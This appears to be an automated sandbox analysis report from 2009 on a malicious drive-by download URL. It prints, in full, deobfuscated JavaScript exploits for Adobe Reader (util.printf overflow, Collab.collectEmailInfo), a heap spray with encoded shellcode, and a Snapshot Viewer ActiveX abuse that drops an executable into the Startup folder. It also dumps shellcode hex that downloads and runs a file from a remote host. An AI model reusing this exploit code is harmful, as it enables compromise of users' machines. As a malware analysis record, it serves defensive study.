Analysis report for http://hugebestbuys.cn:8080/
Sample Overview
| URL | http://hugebestbuys.cn:8080/ |
|---|
| MD5 | 6d564e599ad40773c9d1582bd1876c32 |
|---|
| Analysis Started | 2009-05-22 10:54:59 |
|---|
| Report Generated | 2009-05-22 11:21:52 |
|---|
| Jsand version | 1.03.02 |
|---|
See the report for domain hugebestbuys.cn.
Detection results
| Detector | Result |
|---|
| Jsand 1.03.02 | malicious |
Exploits
| Name | Description | Reference |
|---|
| Adobe util.printf overflow | Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf | CVE-2008-2992 |
Deobfuscation results
Evals
eval(unescape('
%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0020%u0077%u0072%u0041%u004a%u0035%u0074
%u004d%u0035%u0028%u0029%u000d%u000a%u007b%u000d%u000a%u0009%u0066%u006f%u0072%u0028%u0065
%u0058%u0039%u0072%u0044%u0055%u0049%u0056%u0020%u003d%u0020%u0032%u002c%u0020%u006f%u0043
%u0052%u0079%u0056%u007a%u0078%u0058%u006f%u0062%u0020%u003d%u0020%u0022%u0022%u003b%u0020
%u0065%u0058%u0039%u0072%u0044%u0055%u0049%u0056%u0020%u003c%u003d%u0020%u0032%u0036%u003b
%u0020%u0065%u0058%u0039%u0072%u0044%u0055%u0049%u0056%u002b%u002b%u0029%u000d%u000a%u0009
%u007b%u000d%u000a%u0009%u0009%u006f%u0043%u0052%u0079%u0056%u007a%u0078%u0058%u006f%u0062
%u0020%u003d%u0020%u0053%u0074%u0072%u0069%u006e%u0067%u002e%u0066%u0072%u006f%u006d%u0043
%u0068%u0061%u0072%u0043%u006f%u0064%u0065%u0028%u0036%u0035%u0020%u002b%u0020%u0065%u0058
%u0039%u0072%u0044%u0055%u0049%u0056%u0029%u003b%u000d%u000a%u0009%u0009%u0076%u0061%u0072
%u0020%u006f%u0064%u0033%u0046%u0049%u0031%u0074%u0064%u0069%u0020%u003d%u0020%u006e%u0065
%u0077%u0020%u0049%u006d%u0061%u0067%u0065%u0028%u0029%u003b%u000d%u000a%u0009%u0009%u006f
%u0064%u0033%u0046%u0049%u0031%u0074%u0064%u0069%u002e%u0073%u0072%u0063%u0020%u003d%u0020
%u0022%u0072%u0065%u0073%u003a%u002f%u002f%u0022%u0020%u002b%u0020%u006f%u0043%u0052%u0079
%u0056%u007a%u0078%u0058%u006f%u0062%u0020%u002b%u0020%u0022%u003a%u005c%u005c%u0022%u0020
%u002b%u0020%u0027%u0050%u0021%u0029%u0023%u0040%u0072%u005e%u005e%u0026%u006f%u0029%u0067
%u0021%u0023%u0072%u0023%u0023%u0024%u0061%u0023%u0026%u0028%u0021%u006d%u005e%u0023%u0024
%u0023%u0020%u0021%u0046%u0029%u0069%u0023%u0021%u0021%u0029%u006c%u0028%u005e%u0028%u005e
%u0028%u0065%u0028%u0024%u0073%u0024%u0023%u0029%u0021%u0027%u002e%u0072%u0065%u0070%u006c
%u0061%u0063%u0065%u0028%u002f%u005c%u0021%u007c%u0026%u007c%u005c%u0029%u007c%u005c%u005e
%u007c%u0023%u007c%u005c%u0028%u007c%u0040%u007c%u005c%u0024%u002f%u0069%u0067%u002c%u0020
%u0027%u0027%u0029%u0020%u002b%u0020%u0022%u005c%u005c%u0022%u0020%u002b%u0020%u0027%u004f
%u0029%u0024%u0023%u0075%u0026%u0024%u0040%u0074%u0040%u0028%u0028%u0040%u006c%u0023%u0029
%u0026%u0026%u0024%u006f%u0040%u0029%u006f%u0028%u005e%u0024%u006b%u0023%u0020%u0029%u005e
%u0029%u0029%u0045%u0026%u0078%u0021%u0028%u0028%u0024%u0029%u0070%u0023%u0029%u0028%u0072
%u0023%u0026%u0065%u0026%u0023%u0024%u0040%u0073%u0029%u0028%u0073%u0021%u0028%u0027%u002e
%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0026%u007c%u005c%u0021%u007c%u0040
%u007c%u005c%u0024%u007c%u0023%u007c%u005c%u005e%u007c%u005c%u0028%u007c%u005c%u0029%u002f
%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0020%u002b%u0020%u0022%u005c%u005c%u0022%u0020
%u002b%u0020%u0027%u006d%u0026%u005e%u0073%u0029%u0023%u0021%u0024%u006f%u0021%u0021%u0026
%u0065%u0028%u0029%u0023%u0072%u0023%u0029%u0065%u0028%u0029%u0024%u0023%u0073%u0029%u0040
%u002e%u0021%u005e%u0064%u005e%u006c%u0021%u0028%u006c%u0021%u0029%u0027%u002e%u0072%u0065
%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0023%u007c%u005c%u0028%u007c%u0040%u007c%u0026
%u007c%u005c%u0029%u007c%u005c%u005e%u007c%u005c%u0021%u007c%u005c%u0024%u002f%u0069%u0067
%u002c%u0020%u0027%u0027%u0029%u0020%u002b%u0020%u0022%u002f%u0023%u0032%u002f%u0031%u0022
%u003b%u000d%u000a%u000d%u000a%u0009%u0009%u0069%u0066%u0028%u006f%u0064%u0033%u0046%u0049
%u0031%u0074%u0064%u0069%u002e%u0068%u0065%u0069%u0067%u0068%u0074%u0020%u003d%u003d%u0020
%u0035%u0039%u0029%u000d%u000a%u0009%u0009%u007b%u000d%u000a%u0009%u0009%u0009%u0062%u0072
%u0065%u0061%u006b%u003b%u000d%u000a%u0009%u0009%u007d%u000d%u000a%u000d%u000a%u0009%u0009
%u006f%u0064%u0033%u0046%u0049%u0031%u0074%u0064%u0069%u0020%u003d%u0020%u0027%u0027%u003b
%u000d%u000a%u0009%u007d%u000d%u000a%u000d%u000a%u0009%u0072%u0065%u0074%u0075%u0072%u006e
%u0020%u006f%u0043%u0052%u0079%u0056%u007a%u0078%u0058%u006f%u0062%u003b%u000d%u000a%u007d
%u000d%u000a%u000d%u000a%u0066%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0020%u0066%u0055
%u0056%u0062%u0056%u0066%u0053%u0044%u0059%u0028%u0075%u0072%u006c%u0029%u000d%u000a%u007b
%u000d%u000a%u0009%u0076%u0061%u0072%u0020%u006f%u0043%u0052%u0079%u0056%u007a%u0078%u0058
%u006f%u0062%u0020%u003d%u0020%u0077%u0072%u0041%u004a%u0035%u0074%u004d%u0035%u0028%u0029
%u003b%u000d%u000a%u0009%u0069%u0066%u0020%u0028%u006f%u0043%u0052%u0079%u0056%u007a%u0078
%u0058%u006f%u0062%u0020%u003d%u003d%u0020%u0027%u005b%u0027%u0029%u0020%u0072%u0065%u0074
%u0075%u0072%u006e%u003b%u000d%u000a%u000d%u000a%u0009%u0074%u0072%u0079%u000d%u000a%u0009
%u007b%u000d%u000a%u0009%u0009%u0076%u0061%u0072%u0020%u0078%u006a%u0078%u004b%u0038%u0077
%u0051%u0076%u0020%u003d%u0020%u006e%u0065%u0077%u0020%u0041%u0063%u0074%u0069%u0076%u0065
%u0058%u004f%u0062%u006a%u0065%u0063%u0074%u0028%u0027%u0073%u0021%u0023%u0029%u006e%u0040
%u0040%u0070%u0023%u0076%u0023%u0024%u0077%u005e%u002e%u0024%u0021%u0021%u0053%u0040%u0026
%u006e%u0024%u0021%u0061%u0023%u0070%u0026%u0021%u0073%u0026%u0028%u0068%u0029%u0028%u006f
%u0023%u0040%u0074%u0028%u005e%u0040%u0020%u0040%u0029%u0056%u0024%u0069%u005e%u005e%u0021
%u0065%u005e%u0040%u0024%u0077%u0024%u0023%u0065%u0023%u0024%u0029%u0072%u0023%u0026%u0020
%u0021%u0043%u0021%u006f%u0024%u0021%u005e%u006e%u0024%u005e%u0074%u005e%u0023%u0072%u0026
%u0040%u006f%u0023%u0026%u0040%u0021%u006c%u0023%u002e%u0026%u0028%u0029%u0031%u0029%u0024
%u0021%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0040%u007c%u005c
%u0029%u007c%u0023%u007c%u005c%u0024%u007c%u0026%u007c%u005c%u0021%u007c%u005c%u0028%u007c
%u005c%u005e%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0029%u003b%u000d%u000a%u0009
%u007d%u000d%u000a%u000d%u000a%u0009%u0063%u0061%u0074%u0063%u0068%u0028%u0065%u0029%u000d
%u000a%u0009%u007b%u000d%u000a%u0009%u0009%u0069%u0066%u0020%u0028%u0078%u006a%u0078%u004b
%u0038%u0077%u0051%u0076%u0020%u0021%u003d%u0020%u0027%u005b%u0040%u005e%u006f%u005e%u0062
%u0029%u0021%u0028%u006a%u0026%u0021%u0065%u0023%u005e%u0026%u0023%u0063%u0024%u0026%u0028
%u0074%u005e%u0021%u0026%u0023%u0021%u005d%u0028%u0024%u0027%u002e%u0072%u0065%u0070%u006c
%u0061%u0063%u0065%u0028%u002f%u005c%u0021%u007c%u005c%u005e%u007c%u005c%u0029%u007c%u005c
%u0024%u007c%u0023%u007c%u005c%u0028%u007c%u0026%u007c%u0040%u002f%u0069%u0067%u002c%u0020
%u0027%u0027%u0029%u0029%u0020%u0072%u0065%u0074%u0075%u0072%u006e%u003b%u000d%u000a%u0009
%u007d%u000d%u000a%u000d%u000a%u0009%u0078%u006a%u0078%u004b%u0038%u0077%u0051%u0076%u002e
%u0053%u006e%u0061%u0070%u0073%u0068%u006f%u0074%u0050%u0061%u0074%u0068%u0020%u003d%u0020
%u0075%u0072%u006c%u003b%u000d%u000a%u000d%u000a%u0009%u0074%u0072%u0079%u000d%u000a%u0009
%u007b%u000d%u000a%u0009%u0009%u0078%u006a%u0078%u004b%u0038%u0077%u0051%u0076%u002e%u0043
%u006f%u006d%u0070%u0072%u0065%u0073%u0073%u0065%u0064%u0050%u0061%u0074%u0068%u0020%u003d
%u0020%u006f%u0043%u0052%u0079%u0056%u007a%u0078%u0058%u006f%u0062%u0020%u002b%u0020%u0022
%u003a%u005c%u005c%u0022%u0020%u002b%u0020%u0027%u0050%u0040%u0024%u0040%u0072%u0026%u0029
%u006f%u0023%u0023%u0067%u0028%u0072%u0026%u0061%u0028%u006d%u0028%u0040%u0020%u0040%u0023
%u0021%u0046%u0029%u0024%u0069%u0021%u005e%u0021%u006c%u0023%u005e%u005e%u0065%u0021%u0028
%u0073%u0040%u0040%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c
%u0024%u007c%u0026%u007c%u0023%u007c%u005c%u005e%u007c%u005c%u0028%u007c%u005c%u0029%u007c
%u0040%u007c%u005c%u0021%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0020%u002b%u0020
%u0022%u005c%u005c%u0022%u0020%u002b%u0020%u0027%u004f%u0023%u005e%u0075%u0023%u0028%u0028
%u0074%u0029%u0026%u0040%u006c%u005e%u0029%u005e%u006f%u0028%u0040%u006f%u0026%u0040%u005e
%u006b%u0021%u0023%u0020%u0040%u0021%u0026%u0045%u0026%u0040%u0028%u0078%u0026%u0026%u0028
%u0070%u0026%u005e%u0023%u0021%u0024%u0072%u0040%u0065%u0023%u0073%u0024%u0073%u0028%u0040
%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0028%u007c%u005c
%u005e%u007c%u0040%u007c%u005c%u0029%u007c%u0026%u007c%u0023%u007c%u005c%u0024%u007c%u005c
%u0021%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0020%u002b%u0020%u0022%u005c%u005c
%u0022%u0020%u002b%u0020%u0027%u0077%u0021%u0029%u0061%u0029%u0062%u0040%u0029%u0023%u002e
%u0029%u0023%u0065%u0028%u0078%u0023%u0040%u0024%u0065%u0028%u0021%u0028%u0027%u002e%u0072
%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u0040%u007c%u0023%u007c%u005c%u0021%u007c
%u005c%u0029%u007c%u005c%u0024%u007c%u005c%u0028%u007c%u0026%u007c%u005c%u005e%u002f%u0069
%u0067%u002c%u0020%u0027%u0027%u0029%u003b%u000d%u000a%u0009%u0009%u0078%u006a%u0078%u004b
%u0038%u0077%u0051%u0076%u002e%u0050%u0072%u0069%u006e%u0074%u0053%u006e%u0061%u0070%u0073
%u0068%u006f%u0074%u0028%u0029%u003b%u000d%u000a%u0009%u007d%u000d%u000a%u000d%u000a%u0009
%u0063%u0061%u0074%u0063%u0068%u0028%u0065%u0029%u007b%u007d%u003b%u000d%u000a%u000d%u000a
%u0009%u0076%u0061%u0072%u0020%u006c%u0065%u0043%u0075%u0046%u004b%u0059%u0049%u0039%u0020
%u003d%u0020%u0073%u0065%u0074%u0049%u006e%u0074%u0065%u0072%u0076%u0061%u006c%u0028%u0066
%u0075%u006e%u0063%u0074%u0069%u006f%u006e%u0028%u0029%u007b%u0069%u0066%u0020%u0028%u0078
%u006a%u0078%u004b%u0038%u0077%u0051%u0076%u002e%u0072%u0065%u0061%u0064%u0079%u0053%u0074
%u0061%u0074%u0065%u0020%u003d%u003d%u0020%u0034%u0029%u0020%u007b%u0063%u006c%u0065%u0061
%u0072%u0049%u006e%u0074%u0065%u0072%u0076%u0061%u006c%u0028%u006c%u0065%u0043%u0075%u0046
%u004b%u0059%u0049%u0039%u0029%u003b%u0077%u0069%u006e%u0064%u006f%u0077%u002e%u006c%u006f
%u0063%u0061%u0074%u0069%u006f%u006e%u0020%u003d%u0020%u0027%u006c%u0021%u0028%u0024%u0040
%u0064%u0028%u0028%u0021%u0061%u005e%u0028%u0029%u0070%u0024%u0028%u003a%u0023%u0040%u0028
%u002f%u0023%u0029%u0024%u002f%u0023%u0029%u0029%u0027%u002e%u0072%u0065%u0070%u006c%u0061
%u0063%u0065%u0028%u002f%u005c%u0028%u007c%u005c%u0024%u007c%u0040%u007c%u0023%u007c%u0026
%u007c%u005c%u0021%u007c%u005c%u005e%u007c%u005c%u0029%u002f%u0069%u0067%u002c%u0020%u0027
%u0027%u0029%u003b%u007d%u007d%u002c%u0020%u0033%u0030%u0030%u0030%u0029%u003b%u000d%u000a
%u007d%u000d%u000a%u000d%u000a%u0066%u0055%u0056%u0062%u0056%u0066%u0053%u0044%u0059%u0028
%u0027%u0068%u0023%u0028%u0040%u0074%u0029%u0021%u0024%u0026%u0074%u0021%u0023%u0070%u0023
%u005e%u0021%u0021%u003a%u0029%u0026%u0026%u002f%u0029%u0023%u002f%u0026%u0067%u0024%u0026
%u0069%u0024%u005e%u0061%u0029%u0024%u006e%u0021%u0024%u0024%u0024%u0074%u0028%u0062%u0028
%u0065%u0023%u005e%u0061%u0029%u0028%u005e%u0076%u005e%u0021%u0024%u0065%u0026%u0023%u0072
%u0040%u0029%u0023%u0073%u0029%u0024%u0040%u0064%u0026%u0023%u005e%u005e%u0069%u0023%u005e
%u0065%u0040%u0029%u0024%u0023%u005e%u0074%u0026%u0040%u002e%u005e%u0029%u0063%u0040%u0040
%u0026%u0026%u006e%u0026%u0040%u0026%u003a%u0026%u0024%u0028%u0040%u0038%u0028%u0028%u0030
%u0026%u005e%u0038%u0026%u0030%u0021%u0028%u002f%u0023%u0028%u005e%u006c%u0029%u006f%u0040
%u0061%u0023%u0024%u005e%u0064%u0026%u0024%u0040%u002e%u0026%u0070%u0028%u0028%u0026%u005e
%u0068%u0021%u0024%u005e%u0021%u0070%u0028%u0040%u005e%u0026%u0023%u003f%u0023%u005e%u0029
%u0040%u0069%u0040%u005e%u0024%u0024%u0064%u0029%u0023%u0028%u0026%u003d%u0021%u0029%u0031
%u005e%u0023%u0027%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0021
%u007c%u005c%u0029%u007c%u005c%u0024%u007c%u005c%u0028%u007c%u005c%u005e%u007c%u0040%u007c
%u0026%u007c%u0023%u002f%u0069%u0067%u002c%u0020%u0027%u0027%u0029%u0029%u003b'));
function wrAJ5tM5(){
for (eX9rDUIV = 2, oCRyVzxXob = ""; eX9rDUIV <= 26; eX9rDUIV ++ ){
oCRyVzxXob = String.fromCharCode(65 + eX9rDUIV);
var od3FI1tdi = new Image();
od3FI1tdi.src = "res://" + oCRyVzxXob + ":\\" +
'P!)#@r^^&o)g!#r##$a#&(!m^#$# !F)i#!!)l(^(^(e($s$#)!'.replace(/\!|&|\)|\^|#|\(|@|\$/ig
, '') + "\\" + 'O)$#u&$@t@((@l#)&&$o@)o(^$k# )^))E&x!(($)p#)(r#&e&#$@s)(s!('.replace(
/&|\!|@|\$|#|\^|\(|\)/ig, '') + "\\" + 'm&^s)#!$o!!&e()#r#)e()$#s)@.!^d^l!(l!)'.
replace(/#|\(|@|&|\)|\^|\!|\$/ig, '') + "/#2/1";
if (od3FI1tdi.height == 59){
break ;
}
od3FI1tdi = '';
}
return oCRyVzxXob;
}
function fUVbVfSDY(url){
var oCRyVzxXob = wrAJ5tM5();
if (oCRyVzxXob == '[')return ;
try {
var xjxK8wQv = new ActiveXObject('
s!#)n@@p#v#$w^.$!!S@&n$!a#p&!s&(h)(o#@t(^@ @)V$i^^!e^@$w$#e#$)r#& !C!o$!^n$^t^#r&@o#&@!l#.
&()1)$!'.replace(/@|\)|#|\$|&|\!|\(|\^/ig, ''));
}
catch (e){
if (xjxK8wQv != '[@^o^b)!(j&!e#^&#c$&(t^!&#!]($'.replace(/\!|\^|\)|\$|#|\(|&|@/ig, ''
))return ;
}
xjxK8wQv.SnapshotPath = url;
try {
xjxK8wQv.CompressedPath = oCRyVzxXob + ":\\" +
'P@$@r&)o##g(r&a(m(@ @#!F)$i!^!l#^^e!(s@@'.replace(/\$|&|#|\^|\(|\)|@|\!/ig, '') +
"\\" + 'O#^u#((t)&@l^)^o(@o&@^k!# @!&E&@(x&&(p&^#!$r@e#s$s(@'.replace(
/\(|\^|@|\)|&|#|\$|\!/ig, '') + "\\" + 'w!)a)b@)#.)#e(x#@$e(!('.replace(
/@|#|\!|\)|\$|\(|&|\^/ig, '');
xjxK8wQv.PrintSnapshot();
}
catch (e){
}
;
var leCuFKYI9 = setInterval(function (){
if (xjxK8wQv.readyState == 4){
clearInterval(leCuFKYI9);
window.location = 'l!($@d((!a^()p$(:#@(/#)$/#))'.replace(/\(|\$|@|#|&|\!|\^|\)/ig,
'');
}
}
, 3000);
}
fUVbVfSDY('
h#(@t)!$&t!#p#^!!:)&&/)#/&g$&i$^a)$n!$$$t(b(e#^a)(^v^!$e&#r@)#s)$@d&#^^i#^e@)$#^t&@.^)c@@&
&n&@&:&$(@8((0&^8&0!(/#(^l)o@a#$^d&$@.&p((&^h!$^!p(@^&#?#^)@i@^$$d)#(&=!)1^#'.replace(
/\!|\)|\$|\(|\^|@|&|#/ig, ''));
function Zcoiv6stq(Ke36m7){
var Kmhf1ds = 0;
var Sz7tsafm = "";
for (Kmhf1ds = 0; Kmhf1ds < Ke36m7.length; Kmhf1ds ++ ){
Sz7tsafm = Sz7tsafm + String.fromCharCode(Ke36m7.charCodeAt(Kmhf1ds) ^ 4)
}
return Sz7tsafm
}
function D6qh7cc0(Vrnmbjoy){
return unescape(Vrnmbjoy)
}
var N6bn5ls = app.viewerVersion.toString();
N6bn5ls = N6bn5ls.replace(/\D/g, "");
var Kkbfhqas = "!q1714!q1615!" + "q1312!q=g11!q" + "44a<!q4444!q1" + "`44!qa`<7!q75" +
"4`!q20g4!q044" + "7!q3<74!q<f4g" + "!q4g04!q34<f!" + "qe`5g!q04<f!q" + "af4<!q<f4=!q7" +
"004!q04<`!q<f" + "3g!q7g04!q131" + "2!q1afa!q4445" + "!q4544!qfbaa!" + "q450a!q4444!q" +
"ab45!q`2a<!q4" + "445!q1b44!q<=" + "1a!q<5ae!q1ag" + "6!q4445!q1644" + "!q<42<!q4444!" +
"qbb44!q0a=1!q" + "4445!q<=44!q<" + "5ae!q1ag6!q44" + "45!q7544!q45b" + "2!q<eg6!q71=g" +
"!q4627!q4444!" + "qbf<4!q3044!q" + "<<42!q765g!qa" + "f02!qg2aa!q76" + "40!q<=44!q<5a" +
"e!q01g6!q4446" + "!q1644!q=1bb!" + "q4516!q4444!q" + "ae<=!qg6<5!q4" + "614!q4444!q14" +
"16!q=1bb!q451" + "2!q4444!q442e" + "!q442e!qae<=!" + "qg6<5!q451a!q" + "4444!q<=16!q<" +
"5ae!q3<g6!q44" + "46!q1644!q442" + "e!q`4bb!q412e" + "!qae<=!qg6<5!" + "q451a!q4444!q" +
"bb16!q1e=1!q4" + "445!q<=44!q<5" + "ae!q1ag6!q444" + "5!q1644!q<42<" + "!q4444!qbb44!" +
"q0a=1!q4445!q" + "<=44!q<5ae!q1" + "ag6!q4445!q75" + "44!q45b2!q<eg" + "6!q71=g!q462a" +
"!q4444!qbf<4!" + "q3044!q<<42!q" + "765g!qaf02!qg" + "2aa!q7640!q<=" + "44!q<5ae!q01g" +
"6!q4446!q1644" + "!q=1bb!q4516!" + "q4444!qae<=!q" + "g6<5!q4614!q4" + "444!q1416!q=1" +
"bb!q4512!q444" + "4!q442e!q442e" + "!qae<=!qg6<5!" + "q451a!q4444!q" + "<=16!q<5ae!qe" +
"2g6!q4446!q16" + "44!q442e!q`4b" + "b!q412e!qae<=" + "!qg6<5!q451a!" + "q4444!qbb16!q" +
"1e=1!q4445!q=" + "`44!q1b1`!q1e" + "1a!q1f1=!qg71" + "<!q4444!q4444" + "!q4444!q4444!" +
"q4444!q4444!q" + "4444!q4444!q2" + "103!q1030!q2`" + "21!q1434!q302" + "5!q052<!q0g44" +
"!q252b!q0g20!" + "q262=!q2536!q" + "3=36!q4405!q2" + "103!q1430!q2b" + "36!q0527!q202" +
"0!q2136!q3737" + "!q1344!q2a2=!" + "q3<01!q2721!q" + "ff44!qb6<=!qb" + "3<=!qg474!q31" +
"ea!q6=b`!q<=b" + "3!q75b=!qfag4" + "!q447g!q4444!" + "qf147!q465f!q" + "4444!qe`22!q<" +
"147!q465f!q44" + "44!q34<f!q<73" + "<!q5gg2!qf147" + "!q465f!q4444!" + "qf`<`!q465b!q" +
"4444!q47e`!q5" + "f<1!q4446!qef" + "44!q47e`!q5f<" + "1!q4446!q1444" + "!qe`ef!q<147!" +
"q465f!q4444!q" + "1aef!q`f75!q1" + "2e`!q<147!q46" + "5f!q4444!qg2<" + "=!q`3<=!qbg15" +
"!qe2b7!q301=!" + "q1a40!qaf07!q" + "1aa=!q`5=7!q4" + "7a4!q63<1!q44" + "46!q7544!q=2b" +
"2!qe`22!qa4g5" + "!q4746!q5b<1!" + "q4446!q<=44!q" + "e`g2!q<147!q4" + "65f!q4444!qaf" +
"g7!q4454!q444" + "4!q4444!q4444" + "!q4444!q4444!" + "q4444!q4444!q" + "<=44!q5f<1!q4" +
"446!q1244!qa<" + "13!qbb1<!qbbb" + "b!q1a1b!q45ef" + "!q<4ga!qff7a!" + "q4630!qa`af!q" +
"11g7!q0g16!q0" + "b0`!q6a0a!q0g" + "00!q440g!q161" + "1!q000g!q332b" + "!q2g2a!q252b!" +
"q1020!q022b!q" + "2g2=!q0521!q3" + "444!q2220!q34" + "31!q6a20!q3<2" + "1!q4421!q3627" +
"!q3725!q6a2<!" + "q2<34!q4434!q" + "302<!q3430!q6" + "b7e!q236b!q25" + "2=!q302a!q212" +
"6!q3225!q3621" + "!q2037!q212=!" + "q6a30!q2a27!q" + "7<7e!q7<74!q6" + "b74!q252g!q20" +
"2a!q232=!q346" + "a!q342<!q2=7b" + "!q7`20!q447<!" + "q=444" + "";
if (N6bn5ls.charAt(0) == "8" && N6bn5ls.charAt(1) <= "1" && N6bn5ls.charAt(2) <= "2"){
Cglqx7a = D6qh7cc0(Zcoiv6stq(Kkbfhqas));
var Waoonhp = D6qh7cc0("%u0a0a" + "%u0a0a" + "");
var Ryzmq0s = 20 + Cglqx7a.length;
while (Waoonhp.length < Ryzmq0s)Waoonhp += Waoonhp;
var Cshlr8n = Waoonhp.substring(0, Ryzmq0s);
var Qwo9ekywoo = Waoonhp.substring(0, Waoonhp.length - Ryzmq0s);
while (Qwo9ekywoo.length + Ryzmq0s < 0x60000)Qwo9ekywoo = Qwo9ekywoo + Qwo9ekywoo +
Cshlr8n;
var Wk59p9a = new Array();
for (M1w33ne = 0; M1w33ne < 1200; M1w33ne ++ ){
Wk59p9a[M1w33ne] = Qwo9ekywoo + Cglqx7a
}
var O53ukcn6s = "12";
for (var P3yqfc = 0; P3yqfc < 18; P3yqfc ++ ){
O53ukcn6s = O53ukcn6s + "9"
}
for (var P3yqfc = 0; P3yqfc < 276; P3yqfc ++ ){
O53ukcn6s = O53ukcn6s + "8"
}
for (Sskt33f = 0; Sskt33f > 10; Sskt33f ++ ){
Sskt33f += 2
}
util.printf("%45000f", O53ukcn6s)
}
else {
var P63iq4 = new Array();
function R0bshwbk(Gmvjnol, Vrpkildm){
while (Gmvjnol.length * 2 < Vrpkildm){
Gmvjnol += Gmvjnol
}
Gmvjnol = Gmvjnol.substring(0, Vrpkildm
/2);return Gmvjnol}var Gvs9xs1w=0x0c0c0c0c;var Kmdd0eea=D6qh7cc0(Zcoiv6stq(Kkbfhqas));var
Uql3uky=0x400000;var Pv0cs0ru=Kmdd0eea.length*2;var Vrpkildm=Uql3uky-(Pv0cs0ru+0x38);var G
mvjnol=D6qh7cc0("%u9090%u9090");Gmvjnol=R0bshwbk(Gmvjnol,Vrpkildm);var N8vjfmdb=(Gvs9xs1w-
0x400000)/Uql3uky;
for (var Vcz2fhsj5 = 0; Vcz2fhsj5 < N8vjfmdb; Vcz2fhsj5 ++ ){
P63iq4[Vcz2fhsj5] = Gmvjnol + Kmdd0eea
}
var U62qqnw = D6qh7cc0("%u0c0c" + "%u0c0c" + "");
while (U62qqnw.length < 44952)U62qqnw += U62qqnw;
this .collabStore = Collab.collectEmailInfo({
subj : "", msg : U62qqnw
}
)
}
Writes
<iframe src="cache/readme.pdf"></iframe>
<iframe src="cache/flash.swf"></iframe>
Network Activity
Requests
| URL | Status | Content Type |
|---|
| http://hugebestbuys.cn:8080/ | 200 | text/javascript |
| about:blank | 200 | text/html |
| http://hugebestbuys.cn:8080/cache/readme.pdf | 200 | application/pdf |
| http://hugebestbuys.cn:8080/cache/flash.swf | 200 | application/x-shockwave-flash |
Redirects
No redirects.
ActiveX controls
-
| AcroPDF.PDF |
|---|
| No attribute setting or method call detected |
-
| AcrobatJavaScript |
|---|
|
Name |
Arg0 |
Arg1 |
Count |
| Methods |
util.printf |
%45000f |
12999999999999999999888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888888888888888888888888888888888 |
1 |
-
| ShockwaveFlash.ShockwaveFlash |
|---|
| No attribute setting or method call detected |
-
| PDF.PdfCtrl |
|---|
| No attribute setting or method call detected |
-
| clsid:ca8a9780-280d-11cf-a24d-444553540000 |
|---|
| No attribute setting or method call detected |
Shellcode and Malware
| Hexadecimal | ASCII |
|---|
50 53 51 52 56 57 55 9c e8 00 00 00 00 5d 83 ed
0d 31 c0 64 03 40 30 78 0c 8b 40 0c 8b 70 1c ad
8b 40 08 eb 09 8b 40 34 8d 40 7c 8b 40 3c 56 57
be 5e 01 00 00 01 ee bf 4e 01 00 00 01 ef e8 d6
01 00 00 5f 5e 89 ea 81 c2 5e 01 00 00 52 68 80
00 00 00 ff 95 4e 01 00 00 89 ea 81 c2 5e 01 00
00 31 f6 01 c2 8a 9c 35 63 02 00 00 80 fb 00 74
06 88 1c 32 46 eb ee c6 04 32 00 89 ea 81 c2 45
02 00 00 52 ff 95 52 01 00 00 89 ea 81 c2 50 02
00 00 52 50 ff 95 56 01 00 00 6a 00 6a 00 89 ea
81 c2 5e 01 00 00 52 89 ea 81 c2 78 02 00 00 52
6a 00 ff d0 6a 05 89 ea 81 c2 5e 01 00 00 52 ff
95 5a 01 00 00 89 ea 81 c2 5e 01 00 00 52 68 80
00 00 00 ff 95 4e 01 00 00 89 ea 81 c2 5e 01 00
00 31 f6 01 c2 8a 9c 35 6e 02 00 00 80 fb 00 74
06 88 1c 32 46 eb ee c6 04 32 00 89 ea 81 c2 45
02 00 00 52 ff 95 52 01 00 00 89 ea 81 c2 50 02
00 00 52 50 ff 95 56 01 00 00 6a 00 6a 00 89 ea
81 c2 5e 01 00 00 52 89 ea 81 c2 a6 02 00 00 52
6a 00 ff d0 6a 05 89 ea 81 c2 5e 01 00 00 52 ff
95 5a 01 00 00 9d 5d 5f 5e 5a 59 5b 58 c3 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 47 65
74 54 65 6d 70 50 61 74 68 41 00 4c 6f 61 64 4c
69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41
64 64 72 65 73 73 00 57 69 6e 45 78 65 63 00 bb
89 f2 89 f7 30 c0 ae 75 fd 29 f7 89 f9 31 c0 be
3c 00 00 00 03 b5 1b 02 00 00 66 ad 03 85 1b 02
00 00 8b 70 78 83 c6 1c 03 b5 1b 02 00 00 8d bd
1f 02 00 00 ad 03 85 1b 02 00 00 ab ad 03 85 1b
02 00 00 50 ab ad 03 85 1b 02 00 00 ab 5e 31 db
ad 56 03 85 1b 02 00 00 89 c6 89 d7 51 fc f3 a6
59 74 04 5e 43 eb e9 5e 93 d1 e0 03 85 27 02 00
00 31 f6 96 66 ad c1 e0 02 03 85 1f 02 00 00 89
c6 ad 03 85 1b 02 00 00 c3 eb 10 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 89 85 1b 02 00
00 56 57 e8 58 ff ff ff 5f 5e ab 01 ce 80 3e bb
74 02 eb ed c3 55 52 4c 4d 4f 4e 2e 44 4c 4c 00
55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c
65 41 00 70 64 66 75 70 64 2e 65 78 65 00 63 72
61 73 68 2e 70 68 70 00 68 74 74 70 3a 2f 2f 67
69 61 6e 74 62 65 61 76 65 72 73 64 69 65 74 2e
63 6e 3a 38 30 38 30 2f 6c 61 6e 64 69 67 2e 70
